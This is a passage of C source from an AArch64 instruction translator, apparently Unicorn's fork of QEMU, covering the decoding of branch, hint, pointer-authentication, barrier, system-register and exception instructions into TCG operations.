EXCP_UDEF, syn_sve_access_trap(), s->sve_excp_el); return false; } return fp_access_check(s); } /* * This utility function is for doing register extension with an * optional shift. You will likely want to pass a temporary for the * destination register. See DecodeRegExtend() in the ARM ARM. */ static void ext_and_shift_reg(TCGContext *tcg_ctx, TCGv_i64 tcg_out, TCGv_i64 tcg_in, int option, unsigned int shift) { int extsize = extract32(option, 0, 2); bool is_signed = extract32(option, 2, 1); if (is_signed) { switch (extsize) { case 0: tcg_gen_ext8s_i64(tcg_ctx, tcg_out, tcg_in); break; case 1: tcg_gen_ext16s_i64(tcg_ctx, tcg_out, tcg_in); break; case 2: tcg_gen_ext32s_i64(tcg_ctx, tcg_out, tcg_in); break; case 3: tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); break; } } else { switch (extsize) { case 0: tcg_gen_ext8u_i64(tcg_ctx, tcg_out, tcg_in); break; case 1: tcg_gen_ext16u_i64(tcg_ctx, tcg_out, tcg_in); break; case 2: tcg_gen_ext32u_i64(tcg_ctx, tcg_out, tcg_in); break; case 3: tcg_gen_mov_i64(tcg_ctx, tcg_out, tcg_in); break; } } if (shift) { tcg_gen_shli_i64(tcg_ctx, tcg_out, tcg_out, shift); } } static inline void gen_check_sp_alignment(DisasContext *s) { /* The AArch64 architecture mandates that (if enabled via PSTATE * or SCTLR bits) there is a check that SP is 16-aligned on every * SP-relative load or store (with an exception generated if it is not). * In line with general QEMU practice regarding misaligned accesses, * we omit these checks for the sake of guest program performance. * This function is provided as a hook so we can more easily add these * checks in future (possibly as a "favour catching guest program bugs * over speed" user selectable option). */ } /* * This provides a simple table based table lookup decoder. It is * intended to be used when the relevant bits for decode are too * awkwardly placed and switch/if based logic would be confusing and * deeply nested. Since it's a linear search through the table, tables * should be kept small. * * It returns the first handler where insn & mask == pattern, or * NULL if there is no match. * The table is terminated by an empty mask (i.e. 0) */ static inline AArch64DecodeFn *lookup_disas_fn(const AArch64DecodeTable *table, uint32_t insn) { const AArch64DecodeTable *tptr = table; while (tptr->mask) { if ((insn & tptr->mask) == tptr->pattern) { return tptr->disas_fn; } tptr++; } return NULL; } /* * The instruction disassembly implemented here matches * the instruction encoding classifications in chapter C4 * of the ARM Architecture Reference Manual (DDI0487B_a); * classification names and decode diagrams here should generally * match up with those in the manual. */ /* Unconditional branch (immediate) * 31 30 26 25 0 * +----+-----------+-------------------------------------+ * | op | 0 0 1 0 1 | imm26 | * +----+-----------+-------------------------------------+ */ static void disas_uncond_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; uint64_t addr = s->pc_curr + sextract32(insn, 0, 26) * 4; if (insn & (1U << 31)) { /* BL Branch with link */ tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, 30), s->base.pc_next); } /* B Branch / BL Branch with link */ reset_btype(s); gen_goto_tb(s, 0, addr); } /* Compare and branch (immediate) * 31 30 25 24 23 5 4 0 * +----+-------------+----+---------------------+--------+ * | sf | 0 1 1 0 1 0 | op | imm19 | Rt | * +----+-------------+----+---------------------+--------+ */ static void disas_comp_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int sf, op, rt; uint64_t addr; TCGLabel *label_match; TCGv_i64 tcg_cmp; sf = extract32(insn, 31, 1); op = extract32(insn, 24, 1); /* 0: CBZ; 1: CBNZ */ rt = extract32(insn, 0, 5); addr = s->pc_curr + sextract32(insn, 5, 19) * 4; tcg_cmp = read_cpu_reg(s, rt, sf); label_match = gen_new_label(tcg_ctx); reset_btype(s); tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ, tcg_cmp, 0, label_match); gen_goto_tb(s, 0, s->base.pc_next); gen_set_label(tcg_ctx, label_match); gen_goto_tb(s, 1, addr); } /* Test and branch (immediate) * 31 30 25 24 23 19 18 5 4 0 * +----+-------------+----+-------+-------------+------+ * | b5 | 0 1 1 0 1 1 | op | b40 | imm14 | Rt | * +----+-------------+----+-------+-------------+------+ */ static void disas_test_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int bit_pos, op, rt; uint64_t addr; TCGLabel *label_match; TCGv_i64 tcg_cmp; bit_pos = (extract32(insn, 31, 1) << 5) | extract32(insn, 19, 5); op = extract32(insn, 24, 1); /* 0: TBZ; 1: TBNZ */ addr = s->pc_curr + sextract32(insn, 5, 14) * 4; rt = extract32(insn, 0, 5); tcg_cmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, tcg_cmp, cpu_reg(s, rt), (1ULL << bit_pos)); label_match = gen_new_label(tcg_ctx); reset_btype(s); tcg_gen_brcondi_i64(tcg_ctx, op ? TCG_COND_NE : TCG_COND_EQ, tcg_cmp, 0, label_match); tcg_temp_free_i64(tcg_ctx, tcg_cmp); gen_goto_tb(s, 0, s->base.pc_next); gen_set_label(tcg_ctx, label_match); gen_goto_tb(s, 1, addr); } /* Conditional branch (immediate) * 31 25 24 23 5 4 3 0 * +---------------+----+---------------------+----+------+ * | 0 1 0 1 0 1 0 | o1 | imm19 | o0 | cond | * +---------------+----+---------------------+----+------+ */ static void disas_cond_b_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int cond; uint64_t addr; if ((insn & (1 << 4)) || (insn & (1 << 24))) { unallocated_encoding(s); return; } addr = s->pc_curr + sextract32(insn, 5, 19) * 4; cond = extract32(insn, 0, 4); reset_btype(s); if (cond < 0x0e) { /* genuinely conditional branches */ TCGLabel *label_match = gen_new_label(tcg_ctx); arm_gen_test_cc(tcg_ctx, cond, label_match); gen_goto_tb(s, 0, s->base.pc_next); gen_set_label(tcg_ctx, label_match); gen_goto_tb(s, 1, addr); } else { /* 0xe and 0xf are both "always" conditions */ gen_goto_tb(s, 0, addr); } } /* HINT instruction group, including various allocated HINTs */ static void handle_hint(DisasContext *s, uint32_t insn, unsigned int op1, unsigned int op2, unsigned int crm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int selector = crm << 3 | op2; if (op1 != 3) { unallocated_encoding(s); return; } switch (selector) { case 0: // 0b00000: /* NOP */ break; case 3: // 0b00011: /* WFI */ s->base.is_jmp = DISAS_WFI; break; case 1: // 0b00001: /* YIELD */ /* When running in MTTCG we don't generate jumps to the yield and * WFE helpers as it won't affect the scheduling of other vCPUs. * If we wanted to more completely model WFE/SEV so we don't busy * spin unnecessarily we would need to do something more involved. */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { s->base.is_jmp = DISAS_YIELD; } break; case 2: // 0b00010: /* WFE */ if (!(tb_cflags(s->base.tb) & CF_PARALLEL)) { s->base.is_jmp = DISAS_WFE; } break; case 4: // 0b00100: /* SEV */ case 5: // 0b00101: /* SEVL */ /* we treat all as NOP at least for now */ break; case 7: // 0b00111: /* XPACLRI */ if (s->pauth_active) { gen_helper_xpaci(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30]); } break; case 8: // 0b01000: /* PACIA1716 */ if (s->pauth_active) { gen_helper_pacia(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0xa: // 0b01010: /* PACIB1716 */ if (s->pauth_active) { gen_helper_pacib(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0xc: // 0b01100: /* AUTIA1716 */ if (s->pauth_active) { gen_helper_autia(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0xe: // 0b01110: /* AUTIB1716 */ if (s->pauth_active) { gen_helper_autib(tcg_ctx, tcg_ctx->cpu_X[17], tcg_ctx->cpu_env, tcg_ctx->cpu_X[17], tcg_ctx->cpu_X[16]); } break; case 0x18: // 0b11000: /* PACIAZ */ if (s->pauth_active) { gen_helper_pacia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], new_tmp_a64_zero(s)); } break; case 0x19: // 0b11001: /* PACIASP */ if (s->pauth_active) { gen_helper_pacia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]); } break; case 0x1a: // 0b11010: /* PACIBZ */ if (s->pauth_active) { gen_helper_pacib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], new_tmp_a64_zero(s)); } break; case 0x1b: // 0b11011: /* PACIBSP */ if (s->pauth_active) { gen_helper_pacib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]); } break; case 0x1c: // 0b11100: /* AUTIAZ */ if (s->pauth_active) { gen_helper_autia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], new_tmp_a64_zero(s)); } break; case 0x1d: // 0b11101: /* AUTIASP */ if (s->pauth_active) { gen_helper_autia(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]); } break; case 0x1e: // 0b11110: /* AUTIBZ */ if (s->pauth_active) { gen_helper_autib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], new_tmp_a64_zero(s)); } break; case 0x1f: // 0b11111: /* AUTIBSP */ if (s->pauth_active) { gen_helper_autib(tcg_ctx, tcg_ctx->cpu_X[30], tcg_ctx->cpu_env, tcg_ctx->cpu_X[30], tcg_ctx->cpu_X[31]); } break; default: /* default specified as NOP equivalent */ break; } } static void gen_clrex(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_movi_i64(tcg_ctx, tcg_ctx->cpu_exclusive_addr, -1); } /* CLREX, DSB, DMB, ISB */ static void handle_sync(DisasContext *s, uint32_t insn, unsigned int op1, unsigned int op2, unsigned int crm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGBar bar; if (op1 != 3) { unallocated_encoding(s); return; } switch (op2) { case 2: /* CLREX */ gen_clrex(s, insn); return; case 4: /* DSB */ case 5: /* DMB */ switch (crm & 3) { case 1: /* MBReqTypes_Reads */ bar = TCG_BAR_SC | TCG_MO_LD_LD | TCG_MO_LD_ST; break; case 2: /* MBReqTypes_Writes */ bar = TCG_BAR_SC | TCG_MO_ST_ST; break; default: /* MBReqTypes_All */ bar = TCG_BAR_SC | TCG_MO_ALL; break; } tcg_gen_mb(tcg_ctx, bar); return; case 6: /* ISB */ /* We need to break the TB after this insn to execute * a self-modified code correctly and also to take * any pending interrupts immediately. */ reset_btype(s); gen_goto_tb(s, 0, s->base.pc_next); return; case 7: /* SB */ if (crm != 0 || !dc_isar_feature(aa64_sb, s)) { goto do_unallocated; } /* * TODO: There is no speculation barrier opcode for TCG; * MB and end the TB instead. */ tcg_gen_mb(tcg_ctx, TCG_MO_ALL | TCG_BAR_SC); gen_goto_tb(s, 0, s->base.pc_next); return; default: do_unallocated: unallocated_encoding(s); return; } } static void gen_xaflag(TCGContext *tcg_ctx) { TCGv_i32 z = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, z, tcg_ctx->cpu_ZF, 0); /* * (!C & !Z) << 31 * (!(C | Z)) << 31 * ~((C | Z) << 31) * ~-(C | Z) * (C | Z) - 1 */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_CF, z); tcg_gen_subi_i32(tcg_ctx, tcg_ctx->cpu_NF, tcg_ctx->cpu_NF, 1); /* !(Z & C) */ tcg_gen_and_i32(tcg_ctx, tcg_ctx->cpu_ZF, z, tcg_ctx->cpu_CF); tcg_gen_xori_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 1); /* (!C & Z) << 31 -> -(Z & ~C) */ tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_VF, z, tcg_ctx->cpu_CF); tcg_gen_neg_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF); /* C | Z */ tcg_gen_or_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, z); tcg_temp_free_i32(tcg_ctx, z); } static void gen_axflag(TCGContext *tcg_ctx) { tcg_gen_sari_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, 31); /* V ? -1 : 0 */ tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, tcg_ctx->cpu_VF); /* C & !V */ /* !(Z | V) -> !(!ZF | V) -> ZF & !V -> ZF & ~VF */ tcg_gen_andc_i32(tcg_ctx, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, tcg_ctx->cpu_VF); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_NF, 0); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_VF, 0); } /* MSR (immediate) - move immediate to processor state field */ static void handle_msr_i(DisasContext *s, uint32_t insn, unsigned int op1, unsigned int op2, unsigned int crm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t1; int op = op1 << 3 | op2; /* End the TB by default, chaining is ok. */ s->base.is_jmp = DISAS_TOO_MANY; switch (op) { case 0x00: /* CFINV */ if (crm != 0 || !dc_isar_feature(aa64_condm_4, s)) { goto do_unallocated; } tcg_gen_xori_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 1); s->base.is_jmp = DISAS_NEXT; break; case 0x01: /* XAFlag */ if (crm != 0 || !dc_isar_feature(aa64_condm_5, s)) { goto do_unallocated; } gen_xaflag(tcg_ctx); s->base.is_jmp = DISAS_NEXT; break; case 0x02: /* AXFlag */ if (crm != 0 || !dc_isar_feature(aa64_condm_5, s)) { goto do_unallocated; } gen_axflag(tcg_ctx); s->base.is_jmp = DISAS_NEXT; break; case 0x03: /* UAO */ if (!dc_isar_feature(aa64_uao, s) || s->current_el == 0) { goto do_unallocated; } if (crm & 1) { set_pstate_bits(tcg_ctx, PSTATE_UAO); } else { clear_pstate_bits(tcg_ctx, PSTATE_UAO); } t1 = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_a64(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x04: /* PAN */ if (!dc_isar_feature(aa64_pan, s) || s->current_el == 0) { goto do_unallocated; } if (crm & 1) { set_pstate_bits(tcg_ctx, PSTATE_PAN); } else { clear_pstate_bits(tcg_ctx, PSTATE_PAN); } t1 = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_a64(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x05: /* SPSel */ if (s->current_el == 0) { goto do_unallocated; } t1 = tcg_const_i32(tcg_ctx, crm & PSTATE_SP); gen_helper_msr_i_spsel(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x1e: /* DAIFSet */ t1 = tcg_const_i32(tcg_ctx, crm); gen_helper_msr_i_daifset(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); break; case 0x1f: /* DAIFClear */ t1 = tcg_const_i32(tcg_ctx, crm); gen_helper_msr_i_daifclear(tcg_ctx, tcg_ctx->cpu_env, t1); tcg_temp_free_i32(tcg_ctx, t1); /* For DAIFClear, exit the cpu loop to re-evaluate pending IRQs. */ s->base.is_jmp = DISAS_UPDATE; break; default: do_unallocated: unallocated_encoding(s); return; } } static void gen_get_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt) { TCGv_i32 tmp = tcg_temp_new_i32(tcg_ctx); TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx); /* build bit 31, N */ tcg_gen_andi_i32(tcg_ctx, nzcv, tcg_ctx->cpu_NF, (1U << 31)); /* build bit 30, Z */ tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tmp, tcg_ctx->cpu_ZF, 0); tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 30, 1); /* build bit 29, C */ tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tcg_ctx->cpu_CF, 29, 1); /* build bit 28, V */ tcg_gen_shri_i32(tcg_ctx, tmp, tcg_ctx->cpu_VF, 31); tcg_gen_deposit_i32(tcg_ctx, nzcv, nzcv, tmp, 28, 1); /* generate result */ tcg_gen_extu_i32_i64(tcg_ctx, tcg_rt, nzcv); tcg_temp_free_i32(tcg_ctx, nzcv); tcg_temp_free_i32(tcg_ctx, tmp); } static void gen_set_nzcv(TCGContext *tcg_ctx, TCGv_i64 tcg_rt) { TCGv_i32 nzcv = tcg_temp_new_i32(tcg_ctx); /* take NZCV from R[t] */ tcg_gen_extrl_i64_i32(tcg_ctx, nzcv, tcg_rt); /* bit 31, N */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_NF, nzcv, (1U << 31)); /* bit 30, Z */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_ZF, nzcv, (1 << 30)); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_ZF, tcg_ctx->cpu_ZF, 0); /* bit 29, C */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_CF, nzcv, (1 << 29)); tcg_gen_shri_i32(tcg_ctx, tcg_ctx->cpu_CF, tcg_ctx->cpu_CF, 29); /* bit 28, V */ tcg_gen_andi_i32(tcg_ctx, tcg_ctx->cpu_VF, nzcv, (1 << 28)); tcg_gen_shli_i32(tcg_ctx, tcg_ctx->cpu_VF, tcg_ctx->cpu_VF, 3); tcg_temp_free_i32(tcg_ctx, nzcv); } static TCGLabel *gen_hook_sys(DisasContext *s, uint32_t insn, struct hook *hk) { uc_engine *uc = s->uc; TCGContext *tcg_ctx = uc->tcg_ctx; TCGLabel *label = gen_new_label(tcg_ctx); TCGv_i32 tcg_skip, tcg_insn; TCGv_ptr tcg_hk; tcg_skip = tcg_temp_new_i32(tcg_ctx); tcg_insn = tcg_const_i32(tcg_ctx, insn); tcg_hk = tcg_const_ptr(tcg_ctx, (void*)hk); // Sync pc in advance. gen_a64_set_pc_im(tcg_ctx, s->pc_curr); // Only one hook per instruction for SYS/SYSL/MRS/MSR is allowed. // This is intended and may be extended if it's really necessary. gen_helper_uc_hooksys64(tcg_ctx, tcg_skip, tcg_ctx->cpu_env, tcg_insn, tcg_hk); tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, tcg_skip, 0, label); tcg_temp_free_i32(tcg_ctx, tcg_skip); tcg_temp_free_i32(tcg_ctx, tcg_insn); tcg_temp_free_ptr(tcg_ctx, tcg_hk); return label; } static void may_gen_set_label(DisasContext *s, TCGLabel *label) { if (label) { gen_set_label(s->uc->tcg_ctx, label); } } /* MRS - move from system register * MSR (register) - move to system register * SYS * SYSL * These are all essentially the same insn in 'read' and 'write' * versions, with varying op0 fields. */ static void handle_sys(DisasContext *s, uint32_t insn, bool isread, unsigned int op0, unsigned int op1, unsigned int op2, unsigned int crn, unsigned int crm, unsigned int rt) { TCGContext *tcg_ctx = s->uc->tcg_ctx; const ARMCPRegInfo *ri; TCGv_i64 tcg_rt; uc_engine *uc = s->uc; TCGLabel *label = NULL; struct hook *hook; HOOK_FOREACH_VAR_DECLARE; HOOK_FOREACH(uc, hook, UC_HOOK_INSN) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, s->pc_curr)) { continue; } switch (hook->insn) { case UC_ARM64_INS_MRS: { if (isread && (op0 == 2 || op0 == 3)) { label = gen_hook_sys(s, insn, hook); } break; } case UC_ARM64_INS_MSR: { if (!isread && (op0 == 2 || op0 == 3)) { label = gen_hook_sys(s, insn, hook); } break; } case UC_ARM64_INS_SYSL: { if (isread && op0 == 1) { label = gen_hook_sys(s, insn, hook); } break; } case UC_ARM64_INS_SYS: { if (!isread && op0 == 1) { label = gen_hook_sys(s, insn, hook); } break; } default: break; } if (label) { break; } } ri = get_arm_cp_reginfo(s->cp_regs, ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, crn, crm, op0, op1, op2)); if (!ri) { /* Unknown register; this might be a guest error or a QEMU * unimplemented feature. */ qemu_log_mask(LOG_UNIMP, "%s access to unsupported AArch64 " "system register op0:%d op1:%d crn:%d crm:%d op2:%d\n", isread ? "read" : "write", op0, op1, crn, crm, op2); unallocated_encoding(s); may_gen_set_label(s, label); return; } /* Check access permissions */ if (!cp_access_ok(s->current_el, ri, isread)) { unallocated_encoding(s); may_gen_set_label(s, label); return; } if (ri->accessfn) { /* Emit code to perform further access permissions checks at * runtime; this may result in an exception. */ TCGv_ptr tmpptr; TCGv_i32 tcg_syn, tcg_isread; uint32_t syndrome; gen_a64_set_pc_im(tcg_ctx, s->pc_curr); tmpptr = tcg_const_ptr(tcg_ctx, ri); syndrome = syn_aa64_sysregtrap(op0, op1, op2, crn, crm, rt, isread); tcg_syn = tcg_const_i32(tcg_ctx, syndrome); tcg_isread = tcg_const_i32(tcg_ctx, isread); gen_helper_access_check_cp_reg(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_syn, tcg_isread); tcg_temp_free_ptr(tcg_ctx, tmpptr); tcg_temp_free_i32(tcg_ctx, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_isread); } else if (ri->type & ARM_CP_RAISES_EXC) { /* * The readfn or writefn might raise an exception; * synchronize the CPU state in case it does. */ gen_a64_set_pc_im(tcg_ctx, s->pc_curr); } /* Handle special cases first */ switch (ri->type & ~(ARM_CP_FLAG_MASK & ~ARM_CP_SPECIAL)) { case ARM_CP_NOP: may_gen_set_label(s, label); return; case ARM_CP_NZCV: tcg_rt = cpu_reg(s, rt); if (isread) { gen_get_nzcv(tcg_ctx, tcg_rt); } else { gen_set_nzcv(tcg_ctx, tcg_rt); } may_gen_set_label(s, label); return; case ARM_CP_CURRENTEL: /* Reads as current EL value from pstate, which is * guaranteed to be constant by the tb flags. */ tcg_rt = cpu_reg(s, rt); tcg_gen_movi_i64(tcg_ctx, tcg_rt, s->current_el << 2); may_gen_set_label(s, label); return; case ARM_CP_DC_ZVA: /* Writes clear the aligned block of memory which rt points into. */ tcg_rt = clean_data_tbi(s, cpu_reg(s, rt)); gen_helper_dc_zva(tcg_ctx, tcg_ctx->cpu_env, tcg_rt); may_gen_set_label(s, label); return; default: break; } if ((ri->type & ARM_CP_FPU) && !fp_access_check(s)) { may_gen_set_label(s, label); return; } else if ((ri->type & ARM_CP_SVE) && !sve_access_check(s)) { may_gen_set_label(s, label); return; } tcg_rt = cpu_reg(s, rt); if (isread) { if (ri->type & ARM_CP_CONST) { tcg_gen_movi_i64(tcg_ctx, tcg_rt, ri->resetvalue); } else if (ri->readfn) { TCGv_ptr tmpptr; tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_get_cp_reg64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, tmpptr); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tcg_gen_ld_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset); } } else { if (ri->type & ARM_CP_CONST) { /* If not forbidden by access permissions, treat as WI */ may_gen_set_label(s, label); return; } else if (ri->writefn) { TCGv_ptr tmpptr; tmpptr = tcg_const_ptr(tcg_ctx, ri); gen_helper_set_cp_reg64(tcg_ctx, tcg_ctx->cpu_env, tmpptr, tcg_rt); tcg_temp_free_ptr(tcg_ctx, tmpptr); } else { tcg_gen_st_i64(tcg_ctx, tcg_rt, tcg_ctx->cpu_env, ri->fieldoffset); } } if ((tb_cflags(s->base.tb) & CF_USE_ICOUNT) && (ri->type & ARM_CP_IO)) { /* I/O operations must end the TB here (whether read or write) */ s->base.is_jmp = DISAS_UPDATE; } if (!isread && !(ri->type & ARM_CP_SUPPRESS_TB_END)) { /* * A write to any coprocessor regiser that ends a TB * must rebuild the hflags for the next TB. */ TCGv_i32 tcg_el = tcg_const_i32(tcg_ctx, s->current_el); gen_helper_rebuild_hflags_a64(tcg_ctx, tcg_ctx->cpu_env, tcg_el); tcg_temp_free_i32(tcg_ctx, tcg_el); /* * We default to ending the TB on a coprocessor register write, * but allow this to be suppressed by the register definition * (usually only necessary to work around guest bugs). */ s->base.is_jmp = DISAS_UPDATE; } may_gen_set_label(s, label); } /* System * 31 22 21 20 19 18 16 15 12 11 8 7 5 4 0 * +---------------------+---+-----+-----+-------+-------+-----+------+ * | 1 1 0 1 0 1 0 1 0 0 | L | op0 | op1 | CRn | CRm | op2 | Rt | * +---------------------+---+-----+-----+-------+-------+-----+------+ */ static void disas_system(DisasContext *s, uint32_t insn) { unsigned int l, op0, op1, crn, crm, op2, rt; l = extract32(insn, 21, 1); op0 = extract32(insn, 19, 2); op1 = extract32(insn, 16, 3); crn = extract32(insn, 12, 4); crm = extract32(insn, 8, 4); op2 = extract32(insn, 5, 3); rt = extract32(insn, 0, 5); if (op0 == 0) { if (l || rt != 31) { unallocated_encoding(s); return; } switch (crn) { case 2: /* HINT (including allocated hints like NOP, YIELD, etc) */ handle_hint(s, insn, op1, op2, crm); break; case 3: /* CLREX, DSB, DMB, ISB */ handle_sync(s, insn, op1, op2, crm); break; case 4: /* MSR (immediate) */ handle_msr_i(s, insn, op1, op2, crm); break; default: unallocated_encoding(s); break; } return; } handle_sys(s, insn, l, op0, op1, op2, crn, crm, rt); } /* Exception generation * * 31 24 23 21 20 5 4 2 1 0 * +-----------------+-----+------------------------+-----+----+ * | 1 1 0 1 0 1 0 0 | opc | imm16 | op2 | LL | * +-----------------------+------------------------+----------+ */ static void disas_exc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int opc = extract32(insn, 21, 3); int op2_ll = extract32(insn, 0, 5); int imm16 = extract32(insn, 5, 16); TCGv_i32 tmp; switch (opc) { case 0: /* For SVC, HVC and SMC we advance the single-step state * machine before taking the exception. This is architecturally * mandated, to ensure that single-stepping a system call * instruction works properly. */ switch (op2_ll) { case 1: /* SVC */ gen_ss_advance(s); gen_exception_insn(s, s->base.pc_next, EXCP_SWI, syn_aa64_svc(imm16), default_exception_el(s)); break; case 2: /* HVC */ if (s->current_el == 0) { unallocated_encoding(s); break; } /* The pre HVC helper handles cases when HVC gets trapped * as an undefined insn by runtime configuration. */ gen_a64_set_pc_im(tcg_ctx, s->pc_curr); gen_helper_pre_hvc(tcg_ctx, tcg_ctx->cpu_env); gen_ss_advance(s); gen_exception_insn(s, s->base.pc_next, EXCP_HVC, syn_aa64_hvc(imm16), 2); break; case 3: /* SMC */ if (s->current_el == 0) { unallocated_encoding(s); break; } gen_a64_set_pc_im(tcg_ctx, s->pc_curr); tmp = tcg_const_i32(tcg_ctx, syn_aa64_smc(imm16)); gen_helper_pre_smc(tcg_ctx, tcg_ctx->cpu_env, tmp); tcg_temp_free_i32(tcg_ctx, tmp); gen_ss_advance(s); gen_exception_insn(s, s->base.pc_next, EXCP_SMC, syn_aa64_smc(imm16), 3); break; default: unallocated_encoding(s); break; } break; case 1: if (op2_ll != 0) { unallocated_encoding(s); break; } /* BRK */ gen_exception_bkpt_insn(s, syn_aa64_bkpt(imm16)); break; case 2: if (op2_ll != 0) { unallocated_encoding(s); break; } /* HLT. This has two purposes. * Architecturally, it is an external halting debug instruction. * Since QEMU doesn't implement external debug, we treat this as * it is required for halting debug disabled: it will UNDEF. * Secondly, "HLT 0xf000" is the A64 semihosting syscall instruction. */ #if 0 if (semihosting_enabled() && imm16 == 0xf000) { /* In system mode, don't allow userspace access to semihosting, * to provide some semblance of security (and for consistency * with our 32-bit semihosting). */ if (s->current_el == 0) { unsupported_encoding(s, insn); break; } gen_exception_internal_insn(s, s->pc_curr, EXCP_SEMIHOST); } else { unsupported_encoding(s, insn); } #endif unsupported_encoding(s, insn); break; case 5: if (op2_ll < 1 || op2_ll > 3) { unallocated_encoding(s); break; } /* DCPS1, DCPS2, DCPS3 */ unsupported_encoding(s, insn); break; default: unallocated_encoding(s); break; } } /* Unconditional branch (register) * 31 25 24 21 20 16 15 10 9 5 4 0 * +---------------+-------+-------+-------+------+-------+ * | 1 1 0 1 0 1 1 | opc | op2 | op3 | Rn | op4 | * +---------------+-------+-------+-------+------+-------+ */ static void disas_uncond_b_reg(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; unsigned int opc, op2, op3, rn, op4; unsigned btype_mod = 2; /* 0: BR, 1: BLR, 2: other */ TCGv_i64 dst; TCGv_i64 modifier; opc = extract32(insn, 21, 4); op2 = extract32(insn, 16, 5); op3 = extract32(insn, 10, 6); rn = extract32(insn, 5, 5); op4 = extract32(insn, 0, 5); if (op2 != 0x1f) { goto do_unallocated; } switch (opc) { case 0: /* BR */ case 1: /* BLR */ case 2: /* RET */ btype_mod = opc; switch (op3) { case 0: /* BR, BLR, RET */ if (op4 != 0) { goto do_unallocated; } dst = cpu_reg(s, rn); break; case 2: case 3: if (!dc_isar_feature(aa64_pauth, s)) { goto do_unallocated; } if (opc == 2) { /* RETAA, RETAB */ if (rn != 0x1f || op4 != 0x1f) { goto do_unallocated; } rn = 30; modifier = tcg_ctx->cpu_X[31]; } else { /* BRAAZ, BRABZ, BLRAAZ, BLRABZ */ if (op4 != 0x1f) { goto do_unallocated; } modifier 